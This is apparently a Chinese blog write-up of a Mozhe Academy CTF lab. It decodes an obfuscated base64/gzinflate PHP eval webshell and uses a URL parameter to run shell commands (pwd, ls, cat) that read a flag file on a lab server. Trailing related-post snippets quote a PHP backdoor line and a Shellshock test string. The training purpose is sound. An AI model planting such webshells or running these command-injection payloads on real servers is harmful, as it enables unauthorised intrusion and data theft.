墨者学院 PHP代码分析溯源(第4题) 详解
今天继续给大家介绍CTF通关writeup,本文主要内容是墨者学院 PHP代码分析溯源(第4题)。
免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!
一、题目简介
今天,我们对墨者学院PHP代码分析溯源(第四题)进行学习,该题目地址为:https://www.mozhe.cn/bug/detail/T0YyUmZRa1paTkJNQ0JmVWt3Sm13dz09bW96aGUmozhe,打开后页面如下所示:
我们启动该靶场环境,打开后结果如下所示:
二、破解源码
从题目题设来看,我们需要做的第一步就是破解源码,我们先把题目中源代码复制下来,去掉最外层的eval函数后,添加echo函数,并将其复制为本地的PHP文件,文件内容如下所示:
<?php
echo gzinflate(base64_decode("&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&"));
?>
之后,我们搭建好本地PHP环境,然后尝试访问该页面,结果如下所示:
从上图中可以看出,上述源代码在解析后,最外层是一个eval()函数的代码执行函数,而内层使用了反引号将代码执行转化为了命令执行,我们可以使用任意方式提交参数a,作为命令执行的输入。
三、命令执行拿到key
接下来,我们就可以利用a参数来提交命令,进而获得key了。首先,我们先查看当前web系统所在目录,构造payload如下所示:
http://124.70.91.203:45975/f.php?a=pwd
结果如下所示:
从上图中可以看出,当前网页根目录是/var/www/html,之后,我们来查看一下根目录内部有什么文件,构造payload如下所示:
http://124.70.91.203:45975/f.php?a=ls%20/var/www/html
该payload执行后结果如下所示:
在得到根目录下的文件后,我们怀疑key_813517043132.php文件即隐藏着key值,因此,我们尝试打开访问该文件,构造payload如下所示:
http://124.70.91.203:45975/f.php?a=cat%20key_813517043132.php
该payload执行后,结果如下所示:
我们需要打开文件网页源代码,就可以查看到该文件中的key值了。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200
墨者学院 PHP代码分析溯源(第4题) 详解相关推荐
- 墨者学院-PHP代码分析溯源(第4题)
PHP代码分析溯源(第4题) 难易程度:★★★ 题目类型:命令执行 使用工具:FireFox浏览器 1.打开靶场,看到一串php代码. 2.使用echo,运行一下代码. <?php echo(g ...
- 墨者学院 - WebShell代码分析溯源(第8题)
审查代码 1.先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2.没有新的发现,就去目录查找,根据最后的修改时间排查. C:\Users\BayernChenTutu\D ...
- 墨者学院 - PHP代码分析溯源(第4题)
打开发现提示key在根目录,且给出代码 <?php eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCA ...
- 墨者学院 - PHP代码分析溯源(第2题)
根据题干看了好久的php隐式转换... 还是毫无头绪... 这样的逻辑几乎是无解的... md5(QNKCDZO,32) = 0e830400451993494058024219903391 根据PH ...
- 墨者学院-编辑器漏洞分析溯源(第1题)
编辑器漏洞分析溯源(第1题) 难易程度:★★ 题目类型:编辑器漏洞 使用工具:FireFox浏览器.burpsuite.菜刀 1.打开靶场,看到提示信息显示fckeditor. 2.首先查看fcked ...
- 墨者学院-Bash漏洞分析溯源
Bash漏洞分析溯源 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器.wwwscan 1.打开靶场,根据题目思路找poc.cgi. 2.使用wwwscan扫一下 发现有目录/cgi ...
- 代码分析 | 单细胞转录组数据整合详解
两种整合方法详解 NGS系列文章包括NGS基础.转录组分析 (Nature重磅综述|关于RNA-seq你想知道的全在这).ChIP-seq分析 (ChIP-seq基本分析流程).单细胞测序分析 (重磅 ...
- WebShell代码分析溯源(第1题)墨者学院
一.访问链接 二.下载系统源码后直接放到D盾里扫描,扫到后门文件 三.查看该木马文件 <?php error_reporting(0); $_GET['POST']($_POST['GET']) ...
- 墨者学院 - Bash漏洞分析溯源
bash漏洞技术层面分析 漏洞起源: 漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告,其中出现了一条验证命令: env x='() { :;}; echo vulne ...
最新文章
- 增强学习(二)----- 马尔可夫决策过程MDP
- Odoo(OpenERP)配置文件openerp-server.conf详解
- [攻防世界 pwn]——monkey
- maven 修改文件名_Maven 构建配置文件
- 离散方程式matlab,matlab离散型数据拟合方程,求系数,哪个大神能说说方法
- Linux常用命令——rsync
- 单应性变换(Homography)
- zabbix3.x web设置手册(2)
- 计算机关机后耗电问题,笔记本电脑关机后电池还会耗电怎么解决
- VBOX下安装RHEL5.4增强工具失败的解决办法
- SQL2016发布订阅热备操作手册
- 大型分布式电商系统架构技术总结
- 计算机三级网络技术考过指南 【历年考点汇总】
- 工业B2B电商平台整合延伸工业供应链上下游,打造产业链闭环
- 全球智能制造产业联盟落地深圳
- 用Html5制作 汤姆猫 小游戏
- RSA生成公私钥并加解密
- IGMP组播加入失败原因
- WMS系统数据库表设计
- 模糊神经网络2--基于ANFIS的混沌时间序列预测